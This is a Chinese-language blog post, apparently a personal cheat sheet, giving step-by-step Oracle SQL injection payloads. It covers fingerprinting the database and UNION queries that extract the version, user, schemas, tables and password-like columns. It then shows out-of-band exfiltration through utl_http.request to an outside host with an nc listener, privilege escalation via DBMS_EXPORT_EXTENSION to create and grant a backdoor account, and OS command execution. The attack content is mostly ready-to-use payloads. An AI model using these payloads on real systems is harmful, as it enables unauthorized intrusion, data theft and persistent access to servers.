我爱编程

oracle注入(一般的步骤看之前的脚本)

2018-02-09  本文已影响0人  查无此人asdasd

1.判断是否存在注入点的方法和其他数据库类似,and 1=1 和and 1=2

2.判断数据库为oracle

提交注释字符/*,返回正常即是MySQL,否则继续提交注释符号--,该符号是Oracle和MsSQL支持的注释符,返回正常就需要继续判断。可以继续提交多语句支持符号;如果支持多行查询,说明是MSSQL,因为Oracle不支持多行查询,可以继续提交查询语句:

and exist(select * from dual)

and (select count(*) from user_tables)>0--

利用的原理是dual表和user_tables表是oracle中的系统表,返回正常就判断为Oracle

3.获取基本信息

(1)获取字段数,同样可以使用oder by N 根据返回页面判断

(2)获取数据库版本,执行下面语句:

and 1=2 union select 1,2,(select banner from sys.v_$version where rownum=1),4,5,6 from dual

(3)获取数据库连接用户名

and 1=2 union select 1,2,(select SYS_CONTEXT('USERENV','CURRENT_USER')  from dual),4,5,6 from dual

(4)获取日志文件的绝对路径,同样可以通过这个绝对判断系统类型

and 1=2 union select 1,2,(select instance_name from v$instance),4,5,6 from dual

4.和Mysql>=5.0和MsSQL>=2005的特性利用

(1)爆数据库名

# 爆出第一个数据库名

and 1=2 union select 1,2,(select owner from all_tables where rownum=1),4,5,6 from dual

# 依次爆出所有数据库名,假设第一个库名为first_dbname

and 1=2 union select 1,2,(select owner from all_tables where rownum=1 and owner<>'first_dbname'),4,5,6 from dual

(2)爆出表名

# 爆出第一个表名

and 1=2 union select 1,2,(select table_name from user_tables where rownum=1),4,5,6 from dual

同理,同爆出下一个数据库类似爆出下一个表名就不说了,但是必须注意表名用大写或者表名大写的十六进制代码。

有时候我们只想要某个数据库中含密码字段的表名,采用模糊查询语句,如下:

and (select column_name from user_tab_columns where column_name like '%25pass%25')>0

如果成功也可以继续提交

and 1=2 union select 1,2,(select column_name from user_tab_columns where column_name like '%25pass%25'),4,5,6 from dual

这也是猜解表名的一种方法,不过比上面方法麻烦。

(3)爆字段名

# 爆出表tablename中的第一个字段名

and 1=2 union select 1,2,(select column_name from user_tab_columns where table_name='tablename' and rownum=1),4,5,6 from dual

# 爆出第一个字段名

and 1=2 union select 1,2,(select column_name from user_tab_columns where table_name='tablename' and column_name<>'first_col_name' and rownum=1),4,5,6 from dual

这样就可以爆出所有的字段名了。

这样就可以和普通的注入一样获取字段内容了,就不多说了。

5.Oracle注入过程的特性

这点主要说明在Oracle注入中和其他数据库注入不大一样的几点说明。

(1)字段类型必须确定

oracle注入中严格要求各个字段的类型必须和定义的一致否则会出错,我们可以通过下面方法确定各个字段的类型。

and 1=2 union select 'null',null,null,null,null,null from dual

如此依次将下面的每个null用单引号替换,查看返回页面,返回正常说明那个字段为字符型。确定所有字段类型后就可以注入了, 是字符型的就用‘null’,数字型的就直接null

(2)UTL_HTTP存储过程反弹注入

oracle中提供utl_http.request的包函数,用于取得远程web服务器的请求信息,因为我们可以利用它来反弹回信息。再加上oracle本身经常是已system运行的,所以拿下了oracle基本拿下了服务器了。

具体使用方法如下:

# 判断UTL_HTTP存储搓成是否可用/**/这个地方原文有错 ,用count(*)无法判别函数是否存在,无论是否存在都会返回真,经过测试后,*可以判别

and exist(select * from all_objects where object_name='UTL_HTTP')

# 第一步,本地用nc监听一个端口

nc -vv -l -p 8989

# 注入点执行

and utl_http.request('http:// www.webshell.cc :port'||(SQL Query))=1

# 举个例子

and utl_http.request('http:// www.webshell.cc :port'||(select banner from sys.v_$version where rownum=1))=1--

在NC端就会接收到SQL执行返回的结果。这个有点麻烦,因为每次注入点提交一次请求有nc会断开连接,需要重新启动。

(3)系统特性

在不同的OS平台我们需要考虑到,在window下,oracle是已服务方式启动,在web注射下就可以直接获得system权限,Linux下虽然不是root不过权限也挺高的,可能可以通过web注射添加系统帐户。他们同样用到的函数是:

SYS.DBMS_EXPORT_EXTENSION.GET.DOMAIN_INDEX_TABLES()

具体的应用方法是

SYS.DBMS_EXPORT_EXTENSION.GET.DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);[Attack-Command]END;--',SYS',0,'1',0)

将其中的Attack-Command替换成对应的命令即可,但是需要说明的是该利用方法必须结合上面的UTL_HTTP存储过程。

(4)注入点创建runCMD和文件操作

这个没有实践过不敢妄言,等有了实践再行补上

(5)创建远程连接帐号

注入点执行:

and '1'<>'2'||(select SYS.DBMS_EXPORT_EXTENSION.GET.DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE '' DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '' '' Create USER LengF IDENTIFIED BY LengF '' '';END;--',SYS',0,'1',0) from dual)

确定帐号是否添加成功:

and 1<>(select user_id from all_users where username='lengf')

赋予帐户远程连接权限:

and '1'<>'2'||(select SYS.DBMS_EXPORT_EXTENSION.GET.DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE '' DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '' '' GRANT CONNECT to LengF '' '';END;--',SYS',0,'1',0) from dual

删除帐号:

and '1'<>'2'||(select SYS.DBMS_EXPORT_EXTENSION.GET.DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE '' DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '' '' drop USER LengF '' '';END;--',SYS',0,'1',0) from dual

(6)命令执行

通过添加帐号或者其他手段获取远程连接权限后,利用SQLPUS连接后即可执行命令。

在window中使用:

host CMD   # CMDw为具体命令,比如ipconfig

在Linux下可以使用:

!command CMD

当然除了这个方法执行命令外还可以通过导入导出表执行命令,比较麻烦感兴趣可以自己查。

Oracle注入危害还是很大的,甚至可以执行exploit代码,基本的应用和特性就这些了。

Oracle 注入基础及相关特性总结:https://www.webshell.cc/1220.html

oracle注入的高级用法以及报错注入以及cve https://www.iswin.org/2015/06/13/hack-oracle/

oracle注入常用Java语句 http://www.secange.com/2017/07/oracle%E6%89%A7%E8%A1%8C%E5%91%BD%E4%BB%A4/

oracle原理和初始注入步骤http://latec0mer.com/archives/hacking-oracle-and-drop-database-run-away-basic.html

非常强的oralce注入分析 http://www.codeweblog.com/hacking-oracle-with-sql-injection/

上一篇下一篇

猜你喜欢

热点阅读